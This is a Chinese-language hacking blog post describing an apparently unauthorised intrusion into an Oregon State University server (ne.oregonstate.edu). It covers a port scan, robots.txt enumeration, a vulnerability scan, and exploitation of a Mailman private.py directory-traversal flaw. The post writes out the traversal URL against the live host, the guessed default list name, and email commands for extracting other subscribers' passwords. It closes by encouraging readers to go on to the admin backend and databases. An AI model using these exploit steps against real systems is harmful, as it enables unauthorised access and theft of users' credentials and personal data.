渗透美国美国俄勒冈州立大学系统

 入侵国外网站，不难。虽然手法不一样，但是还是很简单。

ne.oregonstate.edu

简单扫了下服务器，发现开着

www：443

www：8000

ftp：21

www：80

ssh：22

这几个端口，我对使用www协议的443端口很好奇，于是访问：

http://ne.oregonstate.edu:443结果出错了……晕。再一想，呵呵，是https

https://ne.oregonstate.edu就看到界面了

输入https://ne.oregonstate.edu/robots.txt

看到这些东西：

User-agent: *

Disallow: /administrator/

Disallow: /cache/

Disallow: /components/

Disallow: /images/

Disallow: /includes/

Disallow: /installation/

Disallow: /language/

Disallow: /libraries/

Disallow: /media/

Disallow: /modules/

Disallow: /plugins/

Disallow: /templates/

Disallow: /tmp/

Disallow: /xmlrpc/

Disallow: /*?

Disallow: /*/resources/

Disallow: /classes/eecs/fall2009/cs515/

复制代码

访问目录administrator无效。显然根据第一幅图，这是个新建的ssl网站。

好吧，终于打开的X-Scan，扫，漏洞，maiman

很多人不喜欢用X-Scan的原因是X-Scan是款检测软件而不是入侵软件。其实这种软件比入侵软件有深度，更难得，让人学会分析，让人不会迷失在工具中成为一个真正的傻瓜。

检测报告是这么说的：

Mailman private.py 目录跳转漏洞

目标主机运行着 Mailman 邮件列表服务

其存Cgi/private.py存在目录跳转漏洞。 该漏洞在当Web服务没有过滤URL上额外的斜杠时会出现如 Apache 1.3.x,漏洞导致允许列表上的用户利用特殊的web请求，以web服务的权限获取主机上的任意文件， 包括储存在主机上的任意用户的 email 地址，密码

***** Nessus 探测该主机存在此漏洞

***** 通过安装在该主机上的 Mailman版本号

**** .

参见： http://lists.netsys.com/pipermail/full-disclosure/2005-February/031562.html

&nb

sp; 解决方案 : 尽快更新至 Mailman 2.1.6 或通过前面url中的描述进行修补

风险等级 : 高

X-Scan中文没有测试地址。实际的测试地址是：

http://$target/mailman/private/$listname/…/…///mailman?username=$user&password=$pass

换成实际网站就是

https://ne.oregonstate.edu/mailman/private/$listname/…/…///mailman?username=$user&password=$pass

不过提示列表错误。

下面要做的就是猜邮件列表。跟注入猜表段是一样的

https://ne.oregonstate.edu/mailman/private/$listname/…/…///mailman?username=$user&password=$pass

里面的$listname换掉，换成表名，我猜admin、root、newlist猜了半天，看配置方法：

1 安装邮件列表程序

apt-get install mailman

2 修改配置 /etc/mailman/mm_cfg.py 此服务器采用exim4作为邮件服务

DEFAULT_EMAIL_HOST = 'lists.mydomain.com'

DEFAULT_URL_HOST = 'www.mydomain.com'

MTA = None

3 添加默认的邮件列表

newlist mailman

默认是mailman，输入mailman试试

https://ne.oregonstate.edu/mailman/private/mailman/…/…///mailman?username=$user&password=$pass

居然成功了……郁闷死……

下面就是把任意一个存在的用户名和密码带入url里面的&user和$pass带进去，就可以

以web服务的权限获取主机上的任意文件， 包括储存在主机上的任意用户的 email 地址，密码

至于后台“找回密码”，数据库XX等等，随你自己好了。

不过猜密码貌似也不是很难，虽然我还没成功。今天已经凌晨五点了。，扛不住了

Mailman密码遍历

这个目标漏洞存在于运行Mailman邮件列表软件的版本

允许一个列表用户遍历任何一个其他用户的密码

通过向服务器发送特别制作的邮件信息的途径。

发送给$listnamerequest@target一个消息，包括一下几行：

password address=$victim

password address=$subscriber

复制代码

将返回列表$listname的为$victim和$subscriber的密码。

注意：Nessus已经确定这个攻击仅存在于通过查看目标机器上安装的Mailman版本号的方式。

$list已经猜出来了……

我承认这些都是建立在别人基础上的。不过总好过被人说烂了的注入攻击还有什么乱七八糟的要强吧？至少我觉得很锻炼人的渗透和分析能力。

而其技术含量总好过那些整天拿着asp网站不放的文章要好的多吧？

更多信息来自东方联盟网：http://www.vm888.com